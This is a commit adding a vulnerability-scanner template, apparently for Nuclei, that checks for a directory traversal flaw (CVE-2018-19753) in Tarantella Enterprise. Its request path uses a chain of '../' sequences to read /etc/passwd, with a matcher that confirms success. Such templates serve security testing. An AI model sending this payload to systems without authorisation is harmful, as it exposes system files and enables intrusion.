Merge pull request #3231 from Akokonunes/patch-81

Create CVE-2018-19753.yaml
patch-1
Prince Chaddha 2021-12-01 19:10:34 +05:30 committed by GitHub
commit 79a351b968
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

View File

@ -0,0 +1,31 @@
id: CVE-2018-19753
info:
name: Tarantella Enterprise Directory Traversal
author: 0x_Akoko
severity: high
description: Tarantella Enterprise versions prior to 3.11 suffer from a directory traversal vulnerability.
reference:
- https://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html
- https://www.cvedetails.com/cve/CVE-2018-19753
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-19753
cwe-id: CWE-22
tags: cve,cve2018,tarantella,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200